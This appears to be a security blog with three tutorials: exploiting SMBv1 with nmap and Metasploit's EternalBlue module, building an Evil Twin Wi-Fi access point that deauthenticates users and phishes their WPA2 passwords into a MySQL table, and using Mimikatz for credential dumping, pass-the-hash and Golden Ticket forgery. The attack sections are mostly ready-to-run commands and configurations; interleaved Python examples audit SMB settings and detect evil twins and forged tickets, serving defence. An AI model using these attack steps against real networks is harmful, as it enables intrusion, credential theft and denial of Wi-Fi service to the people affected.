September 09, 2021

Network penetration testing: SMB protocol

 



Understanding SMB

SMB is a network file and resource sharing protocol that follows the client-server model. Any client on a network can communicate with the SMB server to access resources such as files and directories, or to assign tasks such as printing over the network.

How SMB Works

SMB communication is not difficult to understand: the SMB client connects to an SMB server on the SMB port (445 for the new version; the old version used 139) and accesses the shares. Once the client has access to the shares, it can use the share from its own system and work with the files without downloading them to its machine, or print using a network printer.



Versions of SMB

SMB v1: The first version of SMB. It began in 1980 and has gone through multiple changes. Microsoft first implemented SMBv1 in Windows 95 by introducing CIFS (Common Internet File System). This version of SMB is so vulnerable that it is never recommended for modern network communication, because it uses no encryption, which has been exploited by ransomware attacks such as WannaCry and NotPetya.

SMBv2: This version was introduced with Windows Vista. It improved performance and offered security enhancements compared to the previous version. Version 2.1 was later introduced in Windows 7 and Windows Server 2008 R2, with oplocks (Optimistic Locks) as a feature.

SMBv3: This is the latest and most secure version of SMB so far. It provides end-to-end encryption while communicating with the client. It first came with Windows 8 and Server 2012; later v3.2 was introduced in 8.1 and Server 2012 R2. The latest update is 3.1.1, which is used in Windows 10 and Server 2016.

Enumeration:

In this phase, a pentester should look for the following information from the SMB service:

-        Banner grabbing

-        User Listing

-        User Workgroup

-        Network Share information

-        Remote Operating system

-        SMB security version

To get the above details we use the popular network scanning tool nmap.

               nmap -p 445,139 -A 192.168.1.10

The information we get from the result is:

Operating System: Windows 7 Ultimate

Computername: WIN-8KGN3AE06PK

SMB Security Mode: 2.02
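
The dialect and signing values reported above come from the server's NEGOTIATE response. As an added example (not part of the original article), the parser below reads those fields from a captured response so a defender can audit their own servers for SMBv1, pre-3.x dialects and optional signing; the sample bytes are constructed and build_sample is a hypothetical helper.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0",
            0x0302: "3.0.2", 0x0311: "3.1.1"}
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002


def audit_negotiate_response(data: bytes) -> dict:
    """Classify a captured SMB NEGOTIATE response and list hardening findings."""
    # On TCP 445 each message is prefixed by a zero byte and a 3-byte length.
    if data[:1] == b"\x00" and data[4:8] in (SMB1_MAGIC, SMB2_MAGIC):
        data = data[4:]
    if data[:4] == SMB1_MAGIC:
        return {"protocol": "SMB1", "dialect": None, "signing": None,
                "findings": ["server still negotiates SMBv1"]}
    if data[:4] != SMB2_MAGIC or len(data) < 70:
        raise ValueError("not an SMB NEGOTIATE response")
    (command,) = struct.unpack_from("<H", data, 12)
    if command != 0x0000:
        raise ValueError("SMB2 message is not NEGOTIATE")
    # The 64-byte SMB2 header is followed by StructureSize, SecurityMode
    # and DialectRevision, each a little-endian 16-bit field.
    _size, mode, dialect = struct.unpack_from("<HHH", data, 64)
    if mode & SIGNING_REQUIRED:
        signing = "required"
    elif mode & SIGNING_ENABLED:
        signing = "enabled but not required"
    else:
        signing = "disabled"
    findings = []
    if signing != "required":
        findings.append("message signing is not required")
    if dialect < 0x0300:
        findings.append("dialect predates SMB 3 encryption")
    return {"protocol": "SMB2/3", "dialect": DIALECTS.get(dialect, hex(dialect)),
            "signing": signing, "findings": findings}


def build_sample(dialect: int, mode: int) -> bytes:
    """Constructed NEGOTIATE response (header plus fixed body) for offline use."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)
    header += bytes(16)  # signature field, zeroed
    body = struct.pack("<HHH", 65, mode, dialect) + bytes(59)
    message = header + body
    return b"\x00" + len(message).to_bytes(3, "big") + message


if __name__ == "__main__":
    print(audit_negotiate_response(build_sample(0x0202, SIGNING_ENABLED)))
    print(audit_negotiate_response(build_sample(0x0311, SIGNING_ENABLED | SIGNING_REQUIRED)))
```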



 

Scanning for vulnerabilities:

After enumeration we have the version information and the host operating system. Now it is time for vulnerability scanning. Again we use nmap, as it has a large number of scripts to identify vulnerabilities.

                              nmap --script smb-vuln* -p 445 192.168.1.10

The scan results show that the host is highly vulnerable to the EternalBlue (MS17-010) vulnerability due to SMBv1.


Exploiting SMB vulnerability:

Now that we have the vulnerability information, we will exploit the vulnerability using Metasploit and gain privileges.

We run the following modules on our attacker system:


> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> set rhost <Victim IP>

> exploit





 

Closing words:

This is not the only way to exploit SMB, as there are other ways like PsExec, brute force, and NTLM capture.

I feel the above technique is not that complex, as Metasploit always makes a hacker's life easy.

I hope you find this article valuable and helpful. Happy Hacking!!



December 01, 2019

Hacking WPA2 Wi-Fi password using Evil Twin Attack | DNSMASQ and Hostapd


Wireless protocols have evolved drastically in terms of secured Wi-Fi access since 2003, after the invention of WPA. These days, wireless networks have become a part of our daily life. Almost every home, business, corporate sector, store, industry, and institution has its own wireless AP (Access Point). Moreover, to make the internet free to every individual, some organizations have established public open Wi-Fi APs in almost every public place, like airports, railway stations, libraries, bus terminals, etc. But when it comes to security, even after implementing the best security practices available, a wireless network will always be less secure than a wired network. As David Bernstein once said, “FOR EVERY LOCK, THERE IS SOMEONE OUT THERE TRYING TO PICK IT OR BREAK IT”.

An Evil Twin is like a rogue Wi-Fi AP (Access Point), where an attacker creates a fake AP to lure the users into thinking it is a trusted wireless network. The attacker amplifies the signal in a way that the victim automatically connects to the rogue AP because of its faster beaconing and strong range.

Practical Scenario: The logic behind an Evil Twin attack is simple: you create a fake access point with the same name as the targeted Wi-Fi, then create a webpage that tells the victim he needs to enter the password to access the internet, and store it in a database.



Prerequisites: Below is a list of hardware and software used in this article. You can use any hardware as long as it is compatible with the software you will be using.


Hardware Used:
-          A Laptop (4 GB RAM, Intel i5 processor)
-          USB Wireless TP-LINK Adapter – 150 Mbps (TP-Link WN722N)
-          Wi-Fi dongle for internet connection / Ethernet with internet connectivity

Software Used:
-          VMWare workstation 14
-          Kali Linux 2019.2 OS
-          Airmon-ng, Airodump-ng, Aireplay-ng
-          Dnsmasq
-          Iptables
-          Apache2
-          Mysql
-          Hostapd

Note:
Hostapd: It is used to create a fake targeted access point, be it WEP, WPA, WPA2 personal or enterprise secured. It should work.
Dnsmasq: It is used to resolve DNS requests from/to a host. It can also act as a DHCP server.
Apache: It acts as a web-server to the victim. It will basically host the phishing webpage in the attacker’s system.
Mysql: It is used to store the credentials in the database, entered from the website.
Iptables: It is a firewall, used for the Linux based systems.

Step 1: Setup Environment
Update the operating system and install required packages.
-          sudo apt-get update
-          sudo apt-get install dnsmasq hostapd apache2

Step 2: Configuration of NetworkManager
Before starting monitor mode, make sure your NetworkManager and airmon-ng don’t conflict with each other.

Open the configuration file of the NetworkManager and put the MAC address of the device that you want your NetworkManager to stop managing.
-          gedit /etc/NetworkManager/NetworkManager.conf

Now add the lines mentioned below at the end of the file:
[keyfile]
unmanaged-devices=mac:AA:BB:CC:DD:EE:FF;mac:A2:B2:C2:D2:E2:F2

Note:
Please replace AA:BB:CC:DD:EE:FF (eth0) and A2:B2:C2:D2:E2:F2 (wlan0) with your respective MAC addresses.

Step 3:  Setup Wireless Interface
Find the wireless interface using iwconfig command. In my case it is wlan0:
-          iwconfig

Put the wireless interface in monitor mode using ‘airmon-ng’. A new interface will be created, in this case it is wlan0mon.
-          airmon-ng start wlan0


Now it’s time to start monitoring all the AIR packets using ‘airodump-ng’.
-          airodump-ng wlan0mon



In this case, I will target CH 9. Please note the target details.


-          BSSID: It is used to describe sections of a wireless local area network or WLAN. It recognizes the access point or router because it has a unique address that creates the wireless network.
-          CH (Channel number): It is the medium through which our wireless networks can send and receive data.
-          ESSID: It is an electronic marker or identifier that serves as an identification and address for your computer, or network device to connect to a wireless router or access point and then access the internet.

(Optional Step): Set tx-power of Wi-Fi card to max: 1000mW to set the best range
-          ifconfig wlan0mon down     # Bring down the interface
-          iw reg set US              # Set region to be US
-          ifconfig wlan0mon up       # Bring the interface up
-          iwconfig wlan0mon          # Check tx-power, should be 30dBm

tx-power stands for transmission power. By default it is set to 20 dBm (Decibel metre) or 100 mW.
tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.
If your country is set to US (United States) during installation, your card should operate at 30 dBm (1000 mW).

Step 4: Setup Fake Access point

First of all, create a directory called “fakeap” under /root.

-          mkdir /root/fakeap
-          cd /root/fakeap
Now create a new hostapd configuration file here and paste the below code inside it.
-          gedit hostapd.conf
Code:
interface=wlan0mon
driver=nl80211
# Take the name from the airodump-ng result
ssid=[Fake AP Name]
hw_mode=g
# Take the channel from the airodump-ng result
channel=[Fake AP Channel]
macaddr_acl=0
ignore_broadcast_ssid=0

Note:
interface: Monitor mode Wireless Interface to use.
ssid: Fake Access Point ESSID (name).
channel: Fake AP Channel to operate on.

Next we just have to execute the .conf file using the below command and our rogue access point will be up and running.
-          hostapd hostapd.conf

Step 5: Set up DHCP
We will use dnsmasq to set up DHCP in the attacker machine. Dnsmasq with the support of forwarder is certainly fast and easy to modify and execute.
Open the terminal and create a configuration file for dnsmasq and paste the below code in it.
-          gedit dnsmasq.conf
Code:
interface=wlan0mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Note:
dhcp-range: IP Range for network clients. 12h is the lease time.
dhcp-option=3: Gateway IP for the networks.
dhcp-option=6: DNS Server.
listen-address: Bind DHCP to local IP.

Next you have to create the network gateway and assign netmask to the interface and add it in the routing table.
-          ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
-          route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Now, let’s start the dnsmasq server.

Step 6: Enable NAT by setting Firewall rules in iptables and set port forwarding
Enter the following commands to set up NAT:
-          iptables --flush
-          iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

-          iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
-          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80
-          iptables -t nat -A POSTROUTING -j MASQUERADE

Now we will set up the port forwarding.
-          echo 1 > /proc/sys/net/ipv4/ip_forward

Step 7: Setup Phishing Site

We need a phishing site like forged document or falsified page, where the user will be lured to enter the passphrase which will be stored in the attacker database.

You can create your own web application but let’s just download from the below link for now.
Extract the .zip file in /root/fakeap/rogueap.
-          unzip rogueap.zip
Next move the content of rogueap/ to /var/www/html directory. Before that don’t forget to clean the content of /var/www/html.
-          rm -rf /var/www/html/*
-          mv /root/fakeap/rogueap/* /var/www/html/
Step 8: Setup Apache server and Mysql database
We need a webserver to host the phishing website in the attacker’s machine. Please execute the below command to start the apache2 server.
-          service apache2 start
So we have our phishing web application ready. Now we require a database to store the passwords the victim will type and submit.
Open Mysql and execute the below commands.
-          service mysql start
-          mysql
-          mysql> create database rogueap;
-          mysql> create user rogueuser;
-          mysql> grant all on rogueap.* to 'rogueuser'@'localhost' identified by 'roguepassword';
-          mysql> use rogueap;
-          mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30));
-          mysql> ALTER DATABASE rogueap CHARACTER SET 'utf8';
Note: Don’t change any values in the above mentioned queries and inside /var/www/html/dbconnect.php, because this is where the credentials are defined. If you change any value of the database configuration you have to modify everywhere.

Step 9: DNS spoof and De-authentication
Now, just redirect the traffic to the Gateway IP of our forged network using dnsspoof.
-          dnsspoof -i wlan0mon
Finally, to take the targeted Wi-Fi down we will use aireplay-ng, which will deauthenticate every user from the targeted Wi-Fi and make it unavailable by sending a high number of requests from our machine. That will force the victim to connect to our rogue access point.
Please execute the below command in the terminal window to de-authenticate the target.
-          aireplay-ng -00 -a AA:BB:CC:DD:EE:FF wlan0mon
-          Note: AA:BB:CC:DD:EE:FF, is the targeted Wi-Fi’s BSSID, you can get it from the result of airodump-ng.
Now you just have to wait for the victim to connect to the Wi-Fi and visit any website; it will redirect to the phishing website.


The moment the victim enters the password it will be stored in our mysql database. To check the password, please execute the below query in mysql.
-          mysql> select * from wpa_keys;

The password is: p@ssword123
So that’s it. That is how you can create an Evil Twin and steal the password from the targeted Wi-Fi.
Defending Against an Evil Twin Attack
-          The best way to defend against the Evil Twin attack is to know about the tactic so that you can understand in which situation it should be taken as suspicious.

-          The moment you feel you abruptly disconnected from your trusted network and suddenly see an open wireless network with the same name of your trusted AP, you should take it as an abnormal incident.

-          It is recommended to never connect to an open Wi-Fi network, especially those that do not have encrypted communication.

-          If you see the router is updating, you can turn your Wi-Fi off and connect it via LAN to know what is going on.

- For validation purposes, you can connect with the open network from a restricted environment (sandbox) and check if it is asking for any credentials, put in any random credentials and see the response.
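
The warning signs listed above (a sudden disconnect, then an open network carrying the trusted name) can also be checked automatically from a wireless survey. The detector below is an added example, not part of the original article; the AP inventory, the survey records and the deauthentication threshold are constructed assumptions.

```python
from collections import defaultdict

# Assumed inventory of legitimate APs (constructed values).
TRUSTED = {"CorpWiFi": {"bssids": {"aa:bb:cc:dd:ee:ff"}, "security": "WPA2-PSK"}}


def flooded_bssids(deauth_events, window=10.0, threshold=30):
    """BSSIDs that received >= threshold deauth frames within any `window` seconds."""
    times_by_bssid = defaultdict(list)
    for timestamp, bssid in deauth_events:
        times_by_bssid[bssid.lower()].append(timestamp)
    flooded = set()
    for bssid, times in times_by_bssid.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flooded.add(bssid)
                break
    return flooded


def find_evil_twins(beacons, deauth_events, trusted=TRUSTED):
    """Flag beacons that reuse a trusted SSID with a wrong BSSID or weaker security."""
    under_deauth = flooded_bssids(deauth_events)
    alerts = []
    for ssid, bssid, channel, security in beacons:
        policy = trusted.get(ssid)
        if policy is None:
            continue  # not one of our networks
        reasons = []
        if bssid.lower() not in policy["bssids"]:
            reasons.append("unknown BSSID")
        if security != policy["security"]:
            reasons.append(f"security is {security}, expected {policy['security']}")
        if not reasons:
            continue
        # A copy that appears while the real AP is being deauthenticated
        # matches the disconnect-then-reconnect pattern described above.
        severity = "high" if under_deauth & policy["bssids"] else "medium"
        alerts.append({"ssid": ssid, "bssid": bssid.lower(), "channel": channel,
                       "severity": severity, "reasons": reasons})
    return alerts


# Constructed survey data: (ssid, bssid, channel, security) and (time_s, target_bssid).
BEACONS = [("CorpWiFi", "AA:BB:CC:DD:EE:FF", 9, "WPA2-PSK"),
           ("CorpWiFi", "02:11:22:33:44:55", 9, "OPEN"),
           ("CoffeeShop", "10:20:30:40:50:60", 1, "OPEN")]
DEAUTHS = [(i * 0.1, "AA:BB:CC:DD:EE:FF") for i in range(40)]

if __name__ == "__main__":
    for alert in find_evil_twins(BEACONS, DEAUTHS):
        print(alert)
```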


July 24, 2019

Mimikatz: Credential harvest, Pass the hash, Golden Ticket


Mimikatz is a tool built in the C language and used to perform password harvesting on the Windows platform. It is well known for extracting cleartext passwords, hashes, PIN codes, and Kerberos tickets from memory; those credentials can then be used to perform lateral movement and access restricted information.

Mimikatz has two more optional components. One is called mimidrv, which is a driver to interact with the Windows kernel, and the other is called mimilib, which is used to bypass AppLocker and provides an Auth package/SSP, a password filter, and sekurlsa for WinDBG.

Mimikatz needs administrator or SYSTEM privilege to get debug rights in order to perform certain actions and connect with the LSASS process.

Relation between LSASS and MIMIKATZ:

LSASS.exe, also known as the Local Security Authority Subsystem Service, is responsible for providing Single Sign-On features in Windows, so that an already logged-in user is not required to authenticate every time they want to access a resource. LSASS provides access not only to the authenticated user's credentials but also to the credentials of open sessions that have been running since the last boot. Mimikatz exploits this credential cache of the LSASS service and provides credential reports to the attacker in various formats.

Execution of Mimikatz:

In terms of the basic objective of Mimikatz, we can retrieve cleartext passwords by using the “debug” command and asking for the passwords.

  • privilege::debug
  • sekurlsa::logonpasswords
Mimikatz needs admin privilege in order to get the LSA (Local Security Authority) information. If it is run as a standard user, the LSA will return errors and Mimikatz becomes useless.

Mimikatz returns a different set of results depending on the version of Windows it is executed on. For example, if we run Mimikatz on XP and on unpatched versions of Windows 7 and 8, we will retrieve not only the SIDs, usernames and domain details but also the passwords in cleartext. Please find the below screenshot for your reference.



But beginning with Windows 8.1, LSASS no longer stores cleartext passwords in memory. Similarly, Windows 10 and Windows Server 2012 R2 provide null information in the password fields for the wdigest and Kerberos providers.



Pass the hash with mimikatz:

From the above figure we see that the plaintext password is no longer available in LSASS memory, but we can still retrieve the NTLM hash. Mimikatz allows running a process as another user by using the retrieved hashes. The attacker authenticates the process to the local system by using the local user's password hashes. This is known as a pass-the-hash attack: instead of following a time-consuming process such as cracking the password from the NTLM hashes, the attacker directly passes the hash and accesses resources remotely using another user's privilege.

To pass the hash, use the below command:

#sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>



The above command opens a new command window on the local machine with the hash of another domain user named “ShortUser”.

The moment the command prompt pops up from the remote system, a connection will be built to a network resource on DC1. For confirmation we can use the “net use” command in the command prompt followed by the <network share>.

C:\> net use \\dc1\fshare 



To view the user connection to the shared resource follow the below command



Golden Ticket Attack:

The previous attack is all about passing the NTLM hash of a valid user to get an existing session. The Golden Ticket attack goes one step further: it convinces the target system that an invalid session is valid and gains access to it.

A Windows system that uses Kerberos trusts a Kerberos ticket only when it is signed by the hash of a ticket granting ticket. If the attacker somehow manages to get the NTLM hash of the Kerberos TGT account, it can be used to sign any ticket on this system other than the legitimate one.

Mimikatz can be used here to get the krbtgt NTLM hash and generate a ‘Golden Ticket’, which can be used to give privilege to any session from any system. To create a Golden Ticket, the below four pieces of information are required.
  •        An administrator username. (if unavailable, any privileged user will be fine)
  •       The FQDN (Fully Qualified Domain Name)
  •       The SID of the domain 
  •       The NTLM hash of the krbtgt account
So we can get the above details in the following ways.

        1)       The username can be anything, existing or non-existing, but the chances of getting a valid session are higher with an existing username.

        2)       We can get the FQDN by executing “ipconfig /all”.



        3)       We can also get the domain SID by executing the “whoami /user” command.



We can get the first three pieces of information from any system, but the krbtgt NTLM hash must be obtained from the Domain Controller. For this, Mimikatz can be used to obtain the krbtgt NTLM hash using “lsadump::lsa /inject /name:krbtgt”.



With the above four pieces of information we can now proceed and create the Golden Ticket from any system by executing the below command in Mimikatz.

Mimikatz # kerberos::golden /user:<username> /domain:<domainname> /SID:<SID> /krbtgt:<krbtgt NTLM hash> /groups:501,502,512,513,518,519,520 /ticket:<ticketname.tck>

After execution of the above command, the ticket will be generated with the name given in the /ticket parameter, and the validity of the ticket will be ten years, for long-term data exfiltration activity.



Now, to use the Golden Ticket, we open an elevated command prompt window and execute the “Kerberos::ptt” (pass-the-ticket) command.



If we closely observe the above screenshot, we find that we first tried to connect to the administrative share on \\DC1 but failed, then applied a Mimikatz session with a Golden Ticket, and right after that access was granted.
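
The properties described above give a defender something to look for: a ten-year validity, a ticket keyed with the krbtgt NTLM hash (which yields the RC4-HMAC encryption type), and a username that may not exist. The triage below is an added example, not part of the original article; the record field names, the 10-hour policy value and the inventory are constructed assumptions.

```python
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)  # assumption: domain policy maximum for a TGT
RC4_HMAC = 0x17                         # etype of a ticket keyed with an NTLM hash


def review_tgt(ticket, known_accounts, max_lifetime=MAX_TGT_LIFETIME, aes_expected=True):
    """Return the reasons a TGT record looks forged (empty list if none)."""
    findings = []
    lifetime = datetime.fromisoformat(ticket["end"]) - datetime.fromisoformat(ticket["start"])
    if lifetime > max_lifetime:
        findings.append(f"lifetime of {lifetime.days} days exceeds domain policy")
    if aes_expected and ticket["etype"] == RC4_HMAC:
        findings.append("RC4-HMAC ticket in a domain that issues AES tickets")
    if ticket["client"].lower() not in known_accounts:
        findings.append("client name does not exist in the directory")
    return findings


def triage(tickets, known_accounts):
    """Map client name -> findings for every suspicious TGT in the inventory."""
    report = {}
    for ticket in tickets:
        if not ticket["server"].lower().startswith("krbtgt/"):
            continue  # service tickets are out of scope here
        findings = review_tgt(ticket, known_accounts)
        if findings:
            report[ticket["client"]] = findings
    return report


# Constructed inventory; names, times and the domain are made up.
KNOWN_ACCOUNTS = {"alice", "administrator"}
TICKETS = [
    {"client": "alice", "server": "krbtgt/LAB.EXAMPLE", "etype": 0x12,
     "start": "2019-07-24T09:00:00", "end": "2019-07-24T19:00:00"},
    {"client": "alice", "server": "cifs/dc1.lab.example", "etype": 0x12,
     "start": "2019-07-24T09:05:00", "end": "2019-07-24T19:00:00"},
    {"client": "helpdesk9", "server": "krbtgt/LAB.EXAMPLE", "etype": 0x17,
     "start": "2019-07-24T11:00:00", "end": "2029-07-21T11:00:00"},
]

if __name__ == "__main__":
    for client, findings in triage(TICKETS, KNOWN_ACCOUNTS).items():
        print(client, findings)
```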

I hope you have enjoyed reading this write-up about Mimikatz; please let me know if you have any queries/feedback in the comment section. We will meet again in my next blog. Happy hacking!!